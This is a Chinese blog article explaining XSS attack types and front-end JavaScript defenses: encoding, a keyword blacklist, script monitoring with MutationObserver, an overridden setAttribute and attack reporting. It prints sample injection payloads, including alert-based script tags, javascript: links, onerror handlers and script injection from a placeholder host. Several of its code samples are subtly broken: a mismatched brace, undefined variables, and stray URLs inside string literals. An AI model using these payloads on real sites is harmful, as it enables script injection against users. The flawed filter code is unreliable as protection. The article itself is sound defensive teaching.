仰天大笑出门去,我辈岂是蓬蒿人。这篇文章主要讲述前端安全 — 浅谈JavaScript拦截XSS相关的知识,希望能为你提供帮助。
XSS/跨站脚本攻击,是一种代码注入网页攻击,攻击者可以将代码植入到其他用户都能访问到的页面(如论坛、留言板、贴吧等)中。
【前端安全 — 浅谈JavaScript拦截XSS】如今,XSS攻击所涉及的场景愈发广泛。越来越多的客户端软件支持 html 解析和 javascript 解析,比如:HTML 文档、XML 文档、Flash、PDF、QQ、一些音乐播放器以及浏览器的功能界面等。这些用户经常使用的场景往往都是 XSS 攻击的高发地带。
一、XSS攻击类型
1. 存储型XSS(持久型)攻击者在表单内提交恶意 js 代码 (如 &
lt;
script&
gt;
alert(\'hello\')&
lt;
/script&
gt;
),网站后端对提交数据不做任何安全处理,直接存储在数据库中。当其他用户访问这个已被攻击的网站,js 代码攻击就会被触发。这个类型的 XSS 攻击会存储在数据库中,持续时间长,影响范围大。
文章图片
2. 反射型XSS(非持久型)反射型 XSS 攻击,是正常用户请求一个非法资源时触发的攻击。此类型攻击通常需要用户主动去访问带攻击的链接,一旦点开了链接,大概率被成功攻击(比如:我有一部电影资源,请点击 http://xxxxx 下载)。
文章图片
3. DOM XSS基于 DOM 的 XSS 攻击是反射型攻击的变种。服务器正常返回数据,其攻击在于正常用户进行某种操作 ( js 操作) 时,触发攻击者的 URL 攻击代码,服务器难以检测出这是否为非法请求。
文章图片
二、XSS攻击的危害
- 挂马;
- 盗取用户cookie;
- DoS(拒绝服务)客户端浏览器;
- 钓鱼攻击,高级钓鱼技巧;
- 编写针对性的 XSS 病毒,删除目标文章、恶意篡改数据、嫁祸;
- 劫持用户 Web 行为, 进一步渗透内网;
- 爆发 Web2.0 蠕虫;
- 蠕虫式的 DDoS 攻击;
- 蠕虫式挂马攻击、刷广告、刷流量、破坏网上数据
- ……
XSS 攻击简单来说就是代码的注入,特指恶意用户输入恶意程序代码。为了防范这类代码的注入,网站需要确保其用户输入的安全性。对于攻击验证,可以采用以下措施:
1. 编码在客户端使用 JavaScript 对用户输入进行编码时,有一些内置的方法和属性可以在自动感知上下文的情况下,对所有的输入数据进行编码。
一些自动编码的方法可参考下表:
上下文 | 方法 |
---|---|
html元素 | 例:&
lt;
div&
gt;
userinput&
lt;
/div&
gt;
<
br>
→ node.textContent = userInput |
html属性 | 例:&
lt;
input value="https://www.songbingjia.com/android/userInput"/&
gt;
<
br>
→ node.setAttribute(attr,userInput) |
URL查询值 | 例:http://example.com/?parameter=userInput <
br>
→ encodeURIComponent(userInput) |
CSS值 | 例:color: userInput <
br>
→ Node.style.property=userInput |
javascript:...
及内联事件 on*
。如: <
a rel="nofollow" href="javascript:alert(\'hello\')" >
<
/a>
<
iframe src="javascript:alert(\'hello\')" />
<
img src=https://www.songbingjia.com/'x\' onerror="alert(\'hello\')" />
<
video src=https://www.songbingjia.com/'x\' onerror="alert(\'hello\')" >
<
/video>
<
div onclick="alert(\'hello\')" onmouseover="alert(\'hello2\')" >
<
div>
类似这种注入,我们需要在浏览器触发点击事件前,对
javascript:...
内容进行黑名单判断,以实现防护效果。对于 on*
也是一样,可以使用 addEventListener
防护内联事件注入: // 定义 黑名单 策略
var
blackList = [
\'xss\',
\'flow..\'
];
// 黑名单匹配
function blackMatch(blackList, value) {
if (!blackList) return false;
for (var i=0;
i <
blackList.length;
i++) {
var reg = new RegExp(blackList[i], \'i\');
if (reg.test(value)) {
return true;
} else {
return false;
}
} document.addEventListener(\'click\', function(e) {
var el = e.target;
//查找 a标签 <
a rel="nofollow" href="javascript:">
if (el.tagName === \'A\' &
&
el.protocol === \'javascript:\') {
var code = el.href.substr(11);
if (blackMatch(blackList, code)) {
//非法输入
elem.href = https://www.songbingjia.com/'javascript:void(0)\';
}
}
}, true)
3. 静态脚本通常,攻击者会向页面中注入一个静态脚本链接,比如,注入
&
lt;
scriptsrc="http://xxx/xss.js"&
gt;
。对于这类注入,我们需要在脚本执行前找出可疑脚本,并销毁掉。此处可使用 MutationObserver
高级 api,在页面加载变化时,对静态脚本文件进行监控: // Mutation 监听DOM树变化
var observer = new MutationObserver(function(mutations) {
mutations.forEach(function(mutation) {
// 添加节点数
var nodes = mutation.addedNodes;
for (var i = 0;
i <
= nodes.length - 1;
i++) {
var node = nodes[i];
//blacklist 黑名单策略列表
if (blackMatch(blackList, code)) {
node.parentNode.removeChild(node);
console.log(\'发现可疑模块:\', node);
}
}
});
});
// 当页面元素节点添加和删除操作会被观察到
observer.observe(document, {
subtree: true,
childList: true
});
4. 动态脚本除上述静态脚本外,攻击者还经常使用动态脚本注入,而且
MutationObserver
api 无法监听 DOM 的变化,攻击脚本依旧会执行。比如: var script = document.createElement(\'script\');
script.setAttribute(\'type\', \'text/javascript\');
script.setAttribute(\'src\', \'http://xxxxx/xss.js\');
document.getElementsByTagName(\'body\')[0].appendChild(script)
这种注入方式,可能需要使用原生的
setAttribute
方法,来监听 src
属性的值,再通过黑名单判断它是否具有合法性,重写 setAttribute
接口来实现防护: var old_setAttribute = Element.prototype.setAttribute;
// 重写 setAttribute 接口
Element.prototype.setAttribute = function(name, value) {if (this.tagName == \'SCRIPT\' &
&
/^src$/i.test(name)) {
// 黑名单判断
if (blackMatch(blackList, value)) {
console.log(\'发现可疑模块:\', value);
return;
}
}old_setAttribute.apply(this, arguments);
};
5. 上报攻击信息上述几种前端防护均需要黑名单库进行判断,然而如何才能增强黑名单呢?
我们需要将攻击者每次的攻击信息收集起来,并发送到服务器进行分析、处理。这样一来,不仅可以增强黑名单,还能根据收集到的信息设计针对性措施。
可定义一个上报函数,使用 node 接收攻击信息。其结果如下:
function hijackReport(name, value) {
var img = document.createElement(\'img\'),
hijackName = name,
hijackValue = https://www.songbingjia.com/android/value.toString(),
curDate = new Date().getTime();
// 上报
img.src = /'http://192.168.1.3:3002/report/?msg=\' + hijackName +
\'&
value=https://www.songbingjia.com/' + hijackValue + \'&
time=\' + curDate;
}
文章图片
在此,有一个防XSS攻击的库可供学习了解。
==Tips - Content Security Policy (CSP)==
使用验证来防止 XSS 攻击的缺陷在于,只要存在一丝漏洞,就会使网站遭到攻击,而 Content Security Policy (CSP) 的标准则能够降低这一风险。(张杰 | 天存信息)
Ref
- 《Web前端黑客技术揭秘》 - 钟晨鸣
- ‘JavaScript防http劫持与XSS’ - shanyezi
- https://github.com/leizongmin/js-xss
推荐阅读
- redis数据同步之redis-shake
- 接口数据使用了 RSA 加密和签名(一篇文章带你搞定)
- 微服务技术专题Netflix动态化配置服务-微服务配置组件变色龙Archaius
- zabbix监控mysql_slave状态
- 嵌入式C语言的高级使用(全网最详细)
- 如何执行许多ajax请求并使用jQuery $ .ajax仅在1个回调中获得结果
- 如何在Laravel中检索信息和任何加密货币(比特币,以太坊)的值
- 如何使用OCRA在Windows中从Ruby脚本创建可执行文件(.exe)
- 如何使用Artyom.js在ReactJS中创建自己的语音助手